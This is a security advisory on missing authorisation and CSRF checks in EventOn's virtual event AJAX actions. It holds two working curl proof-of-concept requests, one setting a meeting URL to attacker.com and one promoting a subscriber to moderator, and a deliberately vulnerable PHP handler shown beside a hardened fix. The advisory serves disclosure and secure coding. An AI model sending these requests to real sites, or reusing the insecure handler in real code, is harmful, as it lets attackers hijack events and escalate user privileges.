Description The plugins do not perform authorisation and CSRF checks in some AJAX actions, allowing unauthenticated users to update virtual event settings, such as the meeting URL, moderator, access details, etc.
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:
curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'
To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:
curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'
v4.5.8 of the premium plugin added capability and CSRF checks; however, the nonce verification is flawed, still allowing the issue to be exploited via CSRF.
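For reference, the bug class behind the two requests above is an admin-ajax handler that is registered for unauthenticated callers (wp_ajax_nopriv_*) and performs neither a capability check nor a nonce check. The following is an added illustration written for this page, not EventOn's own code: the vulnerable shape of such a handler next to a hardened one. The action, function and post type names (demo_*, 'demo_event') are hypothetical; only the request parameters (event_id, _vir_url) are taken from the advisory.

```php
<?php
// Added illustration, not EventOn's code. Hypothetical names throughout;
// the request parameters event_id and _vir_url match the advisory.

// VULNERABLE: reachable by anyone (wp_ajax_nopriv_*), no nonce, no capability
// check, no validation. Anyone can repoint the meeting URL of any event, and
// a logged-in admin can be made to do it via a cross-site request.
add_action( 'wp_ajax_nopriv_demo_save_virtual_event_settings', 'demo_save_virtual_settings_vulnerable' );
add_action( 'wp_ajax_demo_save_virtual_event_settings', 'demo_save_virtual_settings_vulnerable' );
function demo_save_virtual_settings_vulnerable() {
    $event_id = (int) $_POST['event_id'];
    update_post_meta( $event_id, '_vir_url', $_POST['_vir_url'] ); // attacker-controlled value stored as-is
    wp_send_json_success();
}

// HARDENED: authenticated callers only (no wp_ajax_nopriv_ hook), nonce
// verified and fatal on failure, capability checked against the specific
// event, value sanitised and restricted to http(s).
add_action( 'wp_ajax_demo_save_virtual_event_settings_fixed', 'demo_save_virtual_settings_fixed' );
function demo_save_virtual_settings_fixed() {
    // CSRF: third argument true makes the check die on a missing or invalid
    // nonce. Calling wp_verify_nonce() and ignoring its return value, or only
    // checking when the parameter happens to be present, leaves CSRF open.
    check_ajax_referer( 'demo_save_virtual_event_settings', 'nonce', true );

    // Authorisation: the caller must be allowed to edit this particular event.
    $event_id = isset( $_POST['event_id'] ) ? absint( $_POST['event_id'] ) : 0;
    if ( ! $event_id
        || get_post_type( $event_id ) !== 'demo_event'      // hypothetical post type
        || ! current_user_can( 'edit_post', $event_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Input validation: only store a well-formed http(s) URL.
    $url    = isset( $_POST['_vir_url'] ) ? esc_url_raw( wp_unslash( $_POST['_vir_url'] ) ) : '';
    $scheme = $url ? wp_parse_url( $url, PHP_URL_SCHEME ) : '';
    if ( '' === $url || ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        wp_send_json_error( 'invalid url', 400 );
    }

    update_post_meta( $event_id, '_vir_url', $url );
    wp_send_json_success();
}

// The legitimate front end must send the matching nonce with each request,
// e.g. handed to the script via wp_localize_script():
//   'nonce' => wp_create_nonce( 'demo_save_virtual_event_settings' )
```

The same three checks apply to the moderator endpoint: the user ID in _mod should be validated with get_userdata() before being stored, and the caller's right to change moderators for that event should be established with current_user_can() rather than inferred from a client-supplied _user_role value.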